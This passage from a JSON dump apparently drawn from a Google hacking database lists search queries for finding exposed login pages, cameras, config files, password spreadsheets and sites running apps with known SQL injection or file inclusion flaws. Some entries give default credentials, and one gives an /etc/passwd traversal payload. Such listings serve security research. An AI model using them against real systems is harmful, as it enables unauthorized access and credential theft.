Uses ActiveX.", "submited": "2006-06-25", "request": "intitle:\"BlueNet Video Viewer\"", "id": 1394}, {"short description": "intitle:\"stingray fts login\" | ( login.jsp intitle:StingRay )", "long description": "The Stingray File Transfer Server: Open communication regardless of platform, protocol or location. Independant of operating system architecture and the type of communication line, StingRay enables fast and simple file transfer.Login= user:(no password) or admin:stingrayPS: only 1 result now.", "submited": "2006-06-29", "request": "intitle:\"stingray fts login\" | ( login.jsp intitle:StingRay )", "id": 1395}, {"short description": "intitle:Ampache intitle:\"love of music\" password | login | \"Remember Me.\" -welcome", "long description": "Ampache is a Web-based MP3/Ogg/RM/Flac/WMA/M4A manager. It allows you to view, edit, and play your audio files via HTTP/IceCast/Mpd or Moosic. It has support for downsampling, playlists, artist, and album views, album art, random play, song play tracking, user themes, and remote catalogs using XML-RPC.", "submited": "2006-06-29", "request": "intitle:Ampache intitle:\"love of music\" password | login | \"Remember Me.\" -welcome", "id": 1396}, {"short description": "allintitle:\"DVR login\"", "long description": "softwell Technology \"Wit-Eye\" DVR.Default user/pass is admin:adminRequires ActiveX", "submited": "2006-06-30", "request": "allintitle:\"DVR login\"", "id": 1397}, {"short description": "intitle:index.of.config", "long description": "These directories can give information about a web servers configuration. This should never be viewable to the public as some files may contain cleartext of encrypted passwords, depending on the level of security. 
It can also contain information on various ports, security permisions..etc.", "submited": "2006-07-14", "request": "intitle:index.of.config", "id": 1398}, {"short description": "site:extremetracking.com inurl:\"login=\"", "long description": "The search reveals usernames (right in the URL in green) and links to the sites that are signed up with extremetracking.com. From here an attacker can view any of the sites stats, including all the visitors to the site that is being tracked, including their IP adresses.", "submited": "2006-07-31", "request": "site:extremetracking.com inurl:\"login=\"", "id": 1399}, {"short description": "\"SurgeMAIL\" inurl:/cgi/user.cgi ext:cgi", "long description": "surgemail is an email server from netwinsite.com that can be accessed by a web browser. This dork finds the web logins.", "submited": "2006-08-03", "request": "\"SurgeMAIL\" inurl:/cgi/user.cgi ext:cgi", "id": 1400}, {"short description": "intitle:\"Login to @Mail\" (ext:pl | inurl:\"index\") -dwaffleman", "long description": "Webmail is a http based email server made by atmail.com. To get to the admin login instead of the regular login add webadmin/ to the url.", "submited": "2006-08-03", "request": "intitle:\"Login to @Mail\" (ext:pl | inurl:\"index\") -dwaffleman", "id": 1401}, {"short description": "(intitle:\"SilkyMail by Cyrusoft International, Inc.\")|(intitle:\"Welcome to SilkyMail\")|(intitle:\"Willkommen bei SilkyMail\")|(inurl:adv_login.php3)|(in", "long description": "silkyMail is a free internet email client, from www.cyrusoft.com, that runs in your browser. 
The server can work with apache or as a stand alone email server.The google query and url got cut off, it should really be:(intitle:\"SilkyMail by Cyrusoft International, Inc.\")|(intitle:\"Welcome to SilkyMail\")|(intitle:\"Willkommen bei SilkyMail\")|(inurl:adv_login.php3)|(inurl:\"silkymail/imp/login.php3\")http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=%28intitle%3A%22SilkyMail+by+Cyrusoft+International%2C+Inc.%22%29%7C%28intitle%3A%22Welcome+to+SilkyMail%22%29%7C%28intitle%3A%22Willkommen+bei+SilkyMail%22%29%7C%28inurl%3Aadv_login.php3%29%7C%28inurl%3A%22silkymail%2Fimp%2Flogin.php3%22%29&btnG=Search", "submited": "2006-08-03", "request": "(intitle:\"SilkyMail by Cyrusoft International, Inc", "id": 1402}, {"short description": "ext:php intext:\"$dbms\"\"$dbhost\"\"$dbuser\"\"$dbpasswd\"\"$table_prefix\"\"phpbb_installed\"", "long description": "Hacking a phpBB forum. Here you can gather the mySQL connection information for their forum database. View the .php info by using Google's cache feature.", "submited": "2006-08-10", "request": "ext:php intext:\"$dbms\"\"$dbhost\"\"$dbuser\"\"$dbpasswd\"\"$table_prefix\"\"phpbb_installed\"", "id": 1403}, {"short description": "\"Powered by sendcard - an advanced PHP e-card program\" -site:sendcard.org", "long description": "this is for Sendcard remote commands execution,advisory/ poc exploit: http://retrogod.altervista.org/sendcard_340_xpl.html", "submited": "2006-08-13", "request": "\"Powered by sendcard - an advanced PHP e-card program\" -site:sendcard.org", "id": 1404}, {"short description": "\"powered by xmb\"", "long description": "this is for XMB", "submited": "2006-08-13", "request": "\"powered by xmb\"", "id": 1405}, {"short description": "\"powered by minibb forum software\"", "long description": "This dork is for minibb forum software arbitrary remote inclusion. this is about the unset() issue found by S. 
Esser: http://www.hardened-php.net/hphp/zend_hash_del_key_or_index_vulnerability.html Try this c codes to calculate hashes if you wanna test the unset() vuln on some other app: http://johnny.ihackstuff.com/index.php?name=PNphpBB2&file=viewtopic&t=3944", "submited": "2006-08-13", "request": "\"powered by minibb forum software\"", "id": 1406}, {"short description": "inurl:eStore/index.cgi?", "long description": "this is for eStore directory traversal, example exploit:http://[target]/[path]/eStore/index.cgi?page=../../../../../../../../etc/passwd", "submited": "2006-08-13", "request": "inurl:eStore/index.cgi?", "id": 1407}, {"short description": "\"login: *\" \"password: *\" filetype:xls", "long description": "This returns xls files containing login names and passwords. it works by showing all the xls files with password:(something)so a downside is that u do get stuff like \"password protected\", \"password services\" etc. (and the same for login)But...most of the decent ones have the login and password in the text given to you by google, so its easy to seperate the useful ones from the others.", "submited": "2006-09-06", "request": "\"login: *\" \"password= *\" filetype:xls", "id": 1408}, {"short description": "inurl:+:8443/login.php3", "long description": "Plesk is a multi platform control panel solution for hosting.More information: hxxp://www.swsoft.com/plesk/Vulnerability: PLESK 7.5 Reload (and lower) & PLESK 7.6 for M$ Windows path passing and disclosure] Discovered By: GuanYu", "submited": "2006-09-27", "request": "inurl:+:8443/login.php3", "id": 1409}, {"short description": "inurl:wrcontrollite", "long description": "Browse up to 16 security cameras at one time :)", "submited": "2006-09-11", "request": "inurl:wrcontrollite", "id": 1410}, {"short description": "\"Powered by Vsns Lemon\" intitle:\"Vsns Lemon\"", "long description": "hxxp://evuln.com/vulns/106/summary.html", "submited": "2006-09-13", "request": "\"Powered by Vsns Lemon\" intitle:\"Vsns Lemon\"", 
"id": 1411}, {"short description": "inurl:\"simplenews/admin\"", "long description": "hxxp://evuln.com/vulns/94/summary.html", "submited": "2006-09-13", "request": "inurl:\"simplenews/admin\"", "id": 1412}, {"short description": "inurl:\"/?pagename=AdministratorLogin\"", "long description": "Powered by Bariatric AdvantageAdmin Login:Admin login pages for what looks like an inhouse eshop. No obvious public exploits but I'm sure there is a way WinkMore info found here:h**p://catalinalifesciences.com/ Credit to cp for the clean up", "submited": "2006-09-20", "request": "inurl:\"/?pagename=AdministratorLogin\"", "id": 1413}, {"short description": "inurl:\"/?pagename=CustomerLogin\"", "long description": "Customer login pages for what looks like an inhouse eshop. More information here:h**p://catalinalifesciences.com/ Credit to cp for clean up.", "submited": "2006-09-20", "request": "inurl:\"/?pagename=CustomerLogin\"", "id": 1414}, {"short description": "\"LANCOM DSL/*-* Office *\" \"Entry Page\"", "long description": "h**p://www.lancom-systems.de/Login page for these Lancom online DSL devices.", "submited": "2006-10-02", "request": "\"LANCOM DSL/*-* Office *\" \"Entry Page\"", "id": 1415}, {"short description": "intitle:\"AdventNet ManageEngine ServiceDesk Plus\" intext:\"Remember Me\"", "long description": "serviceDesk Plus is a 100 % web-based Help Desk and Asset Management software.vendor: h**p://manageengine.adventnet.com/products/service-desk/index.htmlmanual: h**p://manageengine.adventnet.com/products/service-desk/help/adminguide/index.html", "submited": "2006-10-02", "request": "intitle:\"AdventNet ManageEngine ServiceDesk Plus\" intext:\"Remember Me\"", "id": 1416}, {"short description": "\"Welcome to the CyberGuard unit!\"", "long description": "\"Welcome to the CyberGuard unit! 
To begin configuring your CyberGuard unit now, use the menu to the left, or the Quick Setup Wizard ..\" :)", "submited": "2006-10-02", "request": "\"Welcome to the CyberGuard unit!\"", "id": 1417}, {"short description": "\"SnapGear Management Console\" \"Welcome to the SnapGear Unit!\" -pdf", "long description": "\"Welcome to the SnapGear Unit! To begin configuring your SnapGear unit now, use the menu to the left, or the Quick Setup Wizard ..\" :)PS: this software looks very much like Cyberguard.", "submited": "2006-10-02", "request": "\"SnapGear Management Console\" \"Welcome to the SnapGear Unit!\" -pdf", "id": 1418}, {"short description": "intitle:\"Your Network Device\" Status (LAN | WAN)", "long description": "Login page for the Solwise Sar715+ ADSL Router from solwise.co.uk. Thanks to jeffball55 for the identification of this \"victim\" ;)", "submited": "2006-10-02", "request": "intitle:\"Your Network Device\" Status (LAN | WAN)", "id": 1419}, {"short description": "intitle:\"Net2Phone Init Page\"", "long description": "Net2Phone CommCenter is software that allows you to make phone calls and send faxes to anywhere in the world.", "submited": "2006-10-02", "request": "intitle:\"Net2Phone Init Page\"", "id": 1420}, {"short description": "intitle:Top \"Vantage Service Gateway\" -inurl:zyxel", "long description": "VSG1200 Vantage Service Gateway (topframe), go up one level for the login page. 
Vendor page at h**p://www.i-tech.com.au/products/7828_ZYXEL_VSG_1200_Vantage_Service_Management.asp", "submited": "2006-10-02", "request": "intitle:Top \"Vantage Service Gateway\" -inurl:zyxel", "id": 1421}, {"short description": "intitle:\"AppServ Open Project *\" \"AppServ is a merging open source software installer package\" -phpbb", "long description": "Often includes phpinfo and unsecured links to phpmyadmin.", "submited": "2006-10-02", "request": "intitle:\"AppServ Open Project *\" \"AppServ is a merging open source software installer package\" -phpbb", "id": 1422}, {"short description": "intitle:ARI \"Phone System Administrator\"", "long description": "Login page for \"Asterisk Recording Interface\" (ARI).", "submited": "2006-10-02", "request": "intitle:ARI \"Phone System Administrator\"", "id": 1423}, {"short description": "intitle:\"EvoCam\" inurl:\"webcam.html\"", "long description": "This search identifies EvoCam cameras accessible over the Internet. There are also public exploits that target these cameras: http://www.exploit-db.com/search/?action=search&filter;_page=1&filter;_description=evocam&filter;_exploit_text=&filter;_author=&filter;_platform=0&filter;_type=0&filter;_lang_id=0&filter;_port=&filter;_osvdb=&filter;_cve=Author: Airloom", "submited": "2010-11-10", "request": "intitle:\"EvoCam\" inurl:\"webcam.html\"", "id": 1424}, {"short description": "||Powered by [ClipBucket 2.0.91]", "long description": "This search identifies clpbpucket installations. 
They frequently have an admin/admin default password on the administrative backend located at: http://server/admin_area/login.php .Author: Zhran Team", "submited": "2010-11-10", "request": "||Powered by [ClipBucket 2.0.91]", "id": 1425}, {"short description": "filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS", "long description": "This search locates private SSHHostkeys.Author: loganWHD", "submited": "2010-11-10", "request": "filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS", "id": 1426}, {"short description": "inurl:-cfg intext:\"enable password\"", "long description": "Google search for Cisco config files (some variants below):inurl:router-confginurl:-confg intext:enable passwordinurl:-config intext:\"enable password\"inurl:-cfg intext:\"enable secret\"inurl:-confg intext:enable secretinurl:-confg intext:\"enable secret\"Author: fdisk", "submited": "2010-11-10", "request": "inurl:-cfg intext:\"enable password\"", "id": 1427}, {"short description": "\"Cisco PIX Security Appliance Software Version\" + \"Serial Number\" + \"show ver\" -inurl", "long description": "Google search for Pix Authorization KeysAuthor: fdisk", "submited": "2010-11-10", "request": "\"Cisco PIX Security Appliance Software Version\" + \"Serial Number\" + \"show ver\" -inurl", "id": 1428}, {"short description": "intitle:index.of cisco asa -site:cisco.com", "long description": "Google search for Pix/Asa imagesAuthor: fdisk", "submited": "2010-11-10", "request": "intitle:index.of cisco asa -site:cisco.com", "id": 1429}, {"short description": "intitle:index.of ios -site:cisco.com", "long description": "Google search for Cisco IOS imagesAuthor: fdisk", "submited": "2010-11-10", "request": "intitle:index.of ios -site:cisco.com", "id": 1430}, {"short description": "\"Remote Supervisor Adapter II\" inurl:userlogin_logo.ssi", "long description": "IBM e-server's login pages.Author: DigiP", "submited": "2010-11-10", "request": "\"Remote Supervisor Adapter II\" inurl:userlogin_logo.ssi", "id": 1431}, {"short 
description": "allintext:\"WebServerX Server at\"", "long description": "Quick and dirty WebserverX HTTP server google dork", "submited": "2010-11-10", "request": "allintext:\"WebServerX Server at\"", "id": 1432}, {"short description": "allintext:\"fs-admin.php\"", "long description": "A foothold using allintext:\"fs-admin.php\" shows the world readable directories of a plug-in that enables Wordpress to be used as a forum. Many of the results of the search also show error logs which give an attacker the server side paths including the home directory name. This name is often also used for the login to ftp and shell access, which exposes the system to attack. There is also an undisclosed flaw in version 1.3 of the software, as the author has mentioned in version 1.4 as a security fix, but does not tell us what it is that was patched.Author: DigiP", "submited": "2010-11-11", "request": "allintext:\"fs-admin.php\"", "id": 1433}, {"short description": "allintitle:\"SyncThru Web Service\"", "long description": "This search finds Internet-connected Samsung printer control panels.", "submited": "2010-11-11", "request": "allintitle:\"SyncThru Web Service\"", "id": 1434}, {"short description": "inurl:/dana-na/auth/", "long description": "Juniper SSLAuthor: bugbear", "submited": "2010-11-12", "request": "inurl:/dana-na/auth/", "id": 1435}, {"short description": "inurl:index.php?pagedb=rss -Vulnerability -inurl", "long description": "CVE: 2007-4007EDB-ID: 4221This google dork possibly exposes sites with the Article Directory (index.php page) Remote File Inclusion Vulnerability", "submited": "2010-11-13", "request": "http://www.google.com/search?q=inurl%3Aindex.php%3Fpagedb%3Drss", "id": 1437}, {"short description": "inurl:src/login.php", "long description": "Locates SquirrelMail Login PagesAuthor: 0daydevilz", "submited": "2010-11-13", "request": "inurl:src/login.php", "id": 1438}, {"short description": "inurl:\"sbw2Behoerden.php\"", "long description": "German.Authorities.CMS 
SQL Injection Vulnerability. Bug: /data/sbw2Behoerden.php?sbwtyp=Author: Bloodman", "submited": "2010-11-14", "request": "inurl:\"sbw2Behoerden.php\"", "id": 1439}, {"short description": "allinurl:com_pccookbook", "long description": "Joomla Component com_pccookbook (user_id) SQL Injection Vulnerability - CVE: 2008-0844: http://www.exploit-db.com/exploits/5145", "submited": "2010-11-15", "request": "allinurl:com_pccookbook", "id": 1441}, {"short description": "inurl:\"section.php?name=singers\"", "long description": "6rbScript 3.3 (section.php name) Local File Inclusion Vulnerability - CVE: 2008-6453: http://www.exploit-db.com/exploits/6520", "submited": "2010-11-15", "request": "inurl:\"section.php?name=singers\"", "id": 1442}, {"short description": "Powered by v1.14 powered by philboard v1.14", "long description": "W1L3D4 Philboard 1.2 (Blind SQL/XSS) Multiple Remote Vulnerabilities - CVE: 2008-5192: http://www.exploit-db.com/exploits/5958", "submited": "2010-11-15", "request": "Powered by v1.14 powered by philboard v1.14", "id": 1443}, {"short description": "inurl:index.php%\"Submit%Articles\"%\"Member%Login\"%\"Top%Authors\"", "long description": "Article Directory (index.php page) Remote File Inclusion Vulnerability - CVE: 2007-4007: http://www.exploit-db.com/exploits/4221", "submited": "2010-11-15", "request": "inurl:index.php%\"Submit%Articles\"%\"Member%Login\"%\"Top%Authors\"", "id": 1444}, {"short description": "This page was produced using SAM Broadcaster. Copyright Spacial Audio Solutions, LLC 1999 - 2004.", "long description": "samPHPweb (db.php commonpath) Remote File Inclusion Vulnerability - CVE: 2008-0143: http://www.exploit-db.com/exploits/4834", "submited": "2010-11-15", "request": "This page was produced using SAM Broadcaster. 
Copyright Spacial Audio Solutions, LLC 1999 - 2004.", "id": 1445}, {"short description": "allinurl: \"wordspew-rss.php\"", "long description": "Wordpress Plugin Wordspew Remote SQL Injection Vulnerability - CVE: 2008-0682: http://www.exploit-db.com/exploits/5039", "submited": "2010-11-15", "request": "allinurl: \"wordspew-rss.php\"", "id": 1446}, {"short description": "allinurl: com_clasifier", "long description": "Joomla Component com_clasifier (cat_id) SQL Injection Vulnerability - CVE: 2008-0842: http://www.exploit-db.com/exploits/5146", "submited": "2010-11-15", "request": "allinurl: com_clasifier", "id": 1447}, {"short description": "allinurl: \"com_galeria\"", "long description": "Joomla Component com_galeria Remote SQL Injection Vulnerability - CVE: 2008-0833: http://www.exploit-db.com/exploits/5134", "submited": "2010-11-15", "request": "allinurl: \"com_galeria\"", "id": 1448}, {"short description": "Powered by hwdVideoShare", "long description": "Joomla Component com_hwdvideoshare SQL Injection Vulnerability - CVE: 2008-0916: http://www.exploit-db.com/exploits/5160", "submited": "2010-11-15", "request": "Powered by hwdVideoShare", "id": 1449}, {"short description": "allinurl: modules-php-name-Siir", "long description": "PHP-Nuke Module Siir (id) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5169", "submited": "2010-11-15", "request": "allinurl: modules-php-name-Siir", "id": 1450}, {"short description": "allinurl: id \"com_jooget\"", "long description": "Joomla Component jooget", "submited": "2010-11-15", "request": "allinurl: id \"com_jooget\"", "id": 1452}, {"short description": "allinurl: \"modules/wfdownloads/viewcat.php?cid\"", "long description": "XOOPS Module wfdownloads (cid) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5218", "submited": "2010-11-15", "request": "allinurl: \"modules/wfdownloads/viewcat.php?cid\"", "id": 1453}, {"short description": "allinurl: \"modules/eEmpregos/index.php\"", "long 
description": "XOOPS Module eEmpregos (cid) Remote SQL Injection Vulnerability - CVE: 2008-0874: http://www.exploit-db.com/exploits/5157", "submited": "2010-11-15", "request": "allinurl: \"modules/eEmpregos/index.php\"", "id": 1454}, {"short description": "Powered by Active PHP Bookmarks v1.1.02", "long description": "Active PHP Bookmarks 1.1.02 Remote SQL Injection Vulnerability - CVE: 2008-3748: http://www.exploit-db.com/exploits/6277", "submited": "2010-11-15", "request": "Powered by Active PHP Bookmarks v1.1.02", "id": 1455}, {"short description": "powered by Site Sift", "long description": "Site Sift Listings (id) Remote SQL Injection Vulnerability - CVE: 2008-1869: http://www.exploit-db.com/exploits/5383", "submited": "2010-11-15", "request": "powered by Site Sift", "id": 1456}, {"short description": "\"Create your own free webring and bring traffic to your website. Join now, it's free!\"", "long description": "Prozilla Webring Website Script (category.php cat) Remote SQL Injection - CVE: 2007-4362: http://www.exploit-db.com/exploits/4284", "submited": "2010-11-15", "request": "\"Create your own free webring and bring traffic to your website. 
Join now, it's free!\"", "id": 1457}, {"short description": "inurl:com_joomladate", "long description": "Joomla Component JoomlaDate (user) SQL injection Vulnerability - CVE: 2008-6068: http://www.exploit-db.com/exploits/5748", "submited": "2010-11-15", "request": "inurl:com_joomladate", "id": 1458}, {"short description": "\"powered by ILIAS\"", "long description": "ILIAS 3.7.4 (ref_id) Blind SQL Injection Vulnerability - CVE: 2008-5816: http://www.exploit-db.com/exploits/7570", "submited": "2010-11-15", "request": "\"powered by ILIAS\"", "id": 1459}, {"short description": "allinurl: \"index.php?option=com_doc\"", "long description": "Joomla Component com_doc Remote SQL Injection Vulnerability - CVE: 2008-0772: http://www.exploit-db.com/exploits/5080", "submited": "2010-11-15", "request": "allinurl: \"index.php?option=com_doc\"", "id": 1461}, {"short description": "Powered by GL-SH DEAF forum 6.5.5 final.", "long description": "PHP Forum ohne My SQL Remote File Upload Vulnerability: http://www.exploit-db.com/exploits/10757", "submited": "2010-11-15", "request": "Powered by GL-SH DEAF forum 6.5.5 final.", "id": 1462}, {"short description": "inurl:com_simpleshop", "long description": "Joomla Component simpleshop 3.4 SQL injection Vulnerability - CVE: 2008-2568: http://www.exploit-db.com/exploits/5743", "submited": "2010-11-15", "request": "inurl:com_simpleshop", "id": 1465}, {"short description": "inurl:\"index.php?pageid=\" Property Listings", "long description": "Realtor 747 (index.php categoryid) Remote SQL Injection Vulnerbility - CVE: 2007-3810: http://www.exploit-db.com/exploits/4184", "submited": "2010-11-15", "request": "inurl:\"index.php?pageid=\" Property Listings", "id": 1466}, {"short description": "\"Powered by Smoothflash\"", "long description": "Smoothflash (admin_view_image.php cid) SQL Injection Vulnerability - CVE: 2008-1623: http://www.exploit-db.com/exploits/5322", "submited": "2010-11-15", "request": "\"Powered by Smoothflash\"", "id": 1467}, 
{"short description": "display_blog.php", "long description": "Social Site Generator (sgc_id) Remote SQL Injection Vulnerability - CVE: 2008-6419: http://www.exploit-db.com/exploits/5701", "submited": "2010-11-15", "request": "display_blog.php", "id": 1468}, {"short description": "Snipe Gallery v.3.1.5 by Snipe.Net", "long description": "snipe gallery Script Sql Injection: http://www.exploit-db.com/exploits/14053", "submited": "2010-11-15", "request": "Snipe Gallery v.3.1.5 by Snipe.Net", "id": 1469}, {"short description": "Powered by AspDownload", "long description": "ASP Download 1.03 Arbitrary Change Administrator Account Vulnerability - CVE: 2008-6739: http://www.exploit-db.com/exploits/5780", "submited": "2010-11-15", "request": "Powered by AspDownload", "id": 1470}, {"short description": "DA Mailing List System V2 Powered by DigitalArakan.Net", "long description": "DA Mailing List System V2 Multiple Vulnerabilities: http://www.exploit-db.com/exploits/11348", "submited": "2010-11-15", "request": "DA Mailing List System V2 Powered by DigitalArakan.Net", "id": 1471}, {"short description": "Powered By AJ Auction Web", "long description": "AJ Auction Web 2.0 (cate_id) SQL Injection Vulnerability - CVE: 2008-2860: http://www.exploit-db.com/exploits/5867", "submited": "2010-11-15", "request": "Powered By AJ Auction Web", "id": 1472}, {"short description": "''showad.php?listingid=''", "long description": "BM Classifieds 20080409 Multiple SQL Injection Vulnerabilities - CVE: 2008-1272: http://www.exploit-db.com/exploits/5223", "submited": "2010-11-15", "request": "''showad.php?listingid=''", "id": 1473}, {"short description": "\"Powered by My PHP Indexer 1.0\"", "long description": "My PHP Indexer 1.0 (index.php) Local File Download Vulnerability - CVE: 2008-6183: http://www.exploit-db.com/exploits/6740", "submited": "2010-11-15", "request": "\"Powered by My PHP Indexer 1.0\"", "id": 1474}, {"short description": "allinurl: \"com_rapidrecipe\"user_id", "long 
description": "Joomla Component rapidrecipe 1.6.5 SQL Injection Vulnerability - CVE: 2008-0754: http://www.exploit-db.com/exploits/5103", "submited": "2010-11-15", "request": "allinurl: \"com_rapidrecipe\"user_id", "id": 1475}, {"short description": "allinurl: \"modules/dictionary\"", "long description": "XOOPS Module Dictionary 0.94 Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5267", "submited": "2010-11-15", "request": "allinurl: \"modules/dictionary\"", "id": 1476}, {"short description": "\"RS MAXSOFT\"", "long description": "RX Maxsoft (popup_img.php fotoID) Remote SQL Injection Vulnerability - CVE: 2008-4912: http://www.exploit-db.com/exploits/5426", "submited": "2010-11-15", "request": "\"RS MAXSOFT\"", "id": 1477}, {"short description": "\"2007 RADIOZAZA www.radiozaza.de? istek hatti Version 2.5\"", "long description": "Radio istek scripti 2.5 Remote Configuration Disclosure Vulnerability - CVE: 2009-4096: http://www.exploit-db.com/exploits/10231", "submited": "2010-11-15", "request": "\"2007 RADIOZAZA www.radiozaza.de? 
istek hatti Version 2.5\"", "id": 1478}, {"short description": "allinurl: \"index.php?p=poll\"showresult", "long description": "Koobi Pro 6.25 poll Remote SQL Injection Vulnerability - CVE: 2008-2036: http://www.exploit-db.com/exploits/5448", "submited": "2010-11-15", "request": "allinurl: \"index.php?p=poll\"showresult", "id": 1479}, {"short description": "allinurl: \"com_joovideo\" detail", "long description": "Joomla Component joovideo 1.2.2 (id) SQL Injection Vulnerability - CVE: 2008-1460: http://www.exploit-db.com/exploits/5277", "submited": "2010-11-15", "request": "allinurl: \"com_joovideo\" detail", "id": 1480}, {"short description": "content_by_cat.asp?contentid ''catid''", "long description": "ASPapp Knowledge Base Remote SQL Injection Vulnerability - CVE: 2008-1430: http://www.exploit-db.com/exploits/5286", "submited": "2010-11-15", "request": "content_by_cat.asp?contentid ''catid''", "id": 1483}, {"short description": "Powered By AlstraSoft Video Share Enterprise", "long description": "AlstraSoft Video Share Enterprise 4.5.1 (UID) SQL Injection Vulnerability - CVE: 2008-3386: http://www.exploit-db.com/exploits/6092", "submited": "2010-11-15", "request": "Powered By AlstraSoft Video Share Enterprise", "id": 1484}, {"short description": "\"Powered by PG Real Estate Solution - real estate web site design\"", "long description": "PG Real Estate (Auth Bypass) SQL Injection Vulnerability - CVE: 2008-5306: http://www.exploit-db.com/exploits/7200", "submited": "2010-11-15", "request": "\"Powered by PG Real Estate Solution - real estate web site design\"", "id": 1485}, {"short description": "\"Powered by PG Roomate Finder Solution - roommate estate web site design\"", "long description": "PG Roomate Finder Solution (Auth Bypass) SQL Injection Vulnerability - CVE: 2008-5307: http://www.exploit-db.com/exploits/7201", "submited": "2010-11-15", "request": "\"Powered by PG Roomate Finder Solution - roommate estate web site design\"", "id": 1486}, {"short 
description": "allinurl: com_pcchess \"user_id\"", "long description": "Joomla Component pcchess 0.8 Remote SQL Injection Vulnerability - CVE: 2008-0761: http://www.exploit-db.com/exploits/5104", "submited": "2010-11-15", "request": "allinurl: com_pcchess \"user_id\"", "id": 1487}, {"short description": "Powered by PHP upload - unijimpe.", "long description": "PHP upload - (unijimpe) Remote File Upload Vulnerability: http://www.exploit-db.com/exploits/10732", "submited": "2010-11-15", "request": "Powered by PHP upload - unijimpe.", "id": 1488}, {"short description": "\"Powered by FubarForum v1.6\"", "long description": "FubarForum 1.6 Arbitrary Admin Bypass Vulnerability: http://www.exploit-db.com/exploits/7595", "submited": "2010-11-15", "request": "\"Powered by FubarForum v1.6\"", "id": 1491}, {"short description": "inurl:cfaq/index.php?catid=", "long description": "FAQ Management Script (catid) Remote SQL Injection Vulnerability - CVE: 2008-4743: http://www.exploit-db.com/exploits/6629", "submited": "2010-11-15", "request": "inurl:cfaq/index.php?catid=", "id": 1492}, {"short description": "''name Kose_Yazilari op viewarticle artid''", "long description": "PHP-Nuke Module Kose_Yazilari (artid) SQL Injection Vulnerability - CVE: 2008-1053: http://www.exploit-db.com/exploits/5186", "submited": "2010-11-15", "request": "''name Kose_Yazilari op viewarticle artid''", "id": 1493}, {"short description": "inurl: modifyform.html?code=", "long description": "modifyform (modifyform.html) Remote File Inclusion Vulnerability: http://www.exploit-db.com/exploits/4423", "submited": "2010-11-15", "request": "inurl: modifyform.html?code=", "id": 1494}, {"short description": "allinurl: com_ricette", "long description": "Mambo Component Ricette 1.0 Remote SQL Injection Vulnerability - CVE: 2008-0841: http://www.exploit-db.com/exploits/5133", "submited": "2010-11-15", "request": "allinurl: com_ricette", "id": 1496}, {"short description": "out.php?linkid=1", "long description": "Link 
ADS 1 (out.php linkid) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5930", "submited": "2010-11-15", "request": "out.php?linkid=1", "id": 1497}, {"short description": "\" ActiveKB v1.5 Copyright \"", "long description": "ActiveKB 1.5 Insecure Cookie Handling/Arbitrary Admin Access - CVE: 2008-2338: http://www.exploit-db.com/exploits/5616", "submited": "2010-11-15", "request": "\" ActiveKB v1.5 Copyright \"", "id": 1499}, {"short description": "allinurl:\"com_garyscookbook\"", "long description": "Mambo Component garyscookbook 1.1.1 SQL Injection Vulnerability - CVE: 2008-1137: http://www.exploit-db.com/exploits/5178", "submited": "2010-11-15", "request": "allinurl:\"com_garyscookbook\"", "id": 1500}, {"short description": "inurl:\"index.php?conteudo=\"", "long description": "Waibrasil Remote / Local File Inclusion: http://www.exploit-db.com/exploits/12562", "submited": "2010-11-15", "request": "inurl:\"index.php?conteudo=\"", "id": 1501}, {"short description": "inurl:\"section.php?name=singers\"", "long description": "6rbScript 3.3 (singerid) Remote SQL Injection Vulnerability - CVE: 2008-6454: http://www.exploit-db.com/exploits/6511", "submited": "2010-11-15", "request": "inurl:\"section.php?name=singers\"", "id": 1504}, {"short description": "inurl:cat1.php?catID= \"Spaceacre\"", "long description": "Spaceacre (index.php) SQL/HTML/XSS Injection Vulnerability: http://www.exploit-db.com/exploits/12756", "submited": "2010-11-15", "request": "inurl:cat1.php?catID= \"Spaceacre\"", "id": 1505}, {"short description": "\"Powered by FubarForum v1.6\"", "long description": "FubarForum 1.6 Admin Bypass Change User Password Vulnerability: http://www.exploit-db.com/exploits/7606", "submited": "2010-11-15", "request": "\"Powered by FubarForum v1.6\"", "id": 1506}, {"short description": "intext:2003-2008 RC v3.1 Developed by: GA Soft", "long description": "Rapid Classified 3.1 (cldb.mdb) Database Disclosure Vulnerability - CVE: 2008-6388: 
http://www.exploit-db.com/exploits/7324", "submited": "2010-11-15", "request": "intext:2003-2008 RC v3.1 Developed by: GA Soft", "id": 1507}, {"short description": "inurl:comment.asp intext:Your e-mail address will be used to send you voting and comment activity. Inclusion of your address is optional but Battle Blog cannot notify you of these activities unless you supply an accurate e-mail.", "long description": "Battle Blog 1.25 Auth Bypass SQL Injection / HTML Injection Vulns - CVE: 2009-3718: http://www.exploit-db.com/exploits/9183", "submited": "2010-11-15", "request": "inurl:comment.asp intext:Your e-mail address will be used to send you voting and comment activity. Inclusion of your address is optional but Battle Blog cannot notify you of these activities unless you supply an accurate e-mail.", "id": 1508}, {"short description": "inurl:com_img", "long description": "Joomla Component (com_img) LFI Vulnerability: http://www.exploit-db.com/exploits/15470", "submited": "2010-11-15", "request": "inurl:com_img", "id": 1509}, {"short description": "details.php?p_id=", "long description": "The iceberg 'Content Management System' SQL Injection Vulnerability - CVE: 2010-2016: http://www.exploit-db.com/exploits/12620", "submited": "2010-11-15", "request": "details.php?p_id=", "id": 1511}, {"short description": "allinurl:\"modules/photo/viewcat.php?id\"", "long description": "RunCMS Module Photo 3.02 (cid) Remote SQL Injection Vulnerability - CVE: 2008-1551: http://www.exploit-db.com/exploits/5290", "submited": "2010-11-15", "request": "allinurl:\"modules/photo/viewcat.php?id\"", "id": 1512}, {"short description": "powered by 35mm Slide Gallery", "long description": "35mm Slide Gallery Directory Traversal Vulnerability: http://www.exploit-db.com/exploits/10614", "submited": "2010-11-15", "request": "powered by 35mm Slide Gallery", "id": 1514}, {"short description": "allinurl:\"com_simpleshop\"", "long description": "Joomla Component simple shop 2.0 SQL Injection 
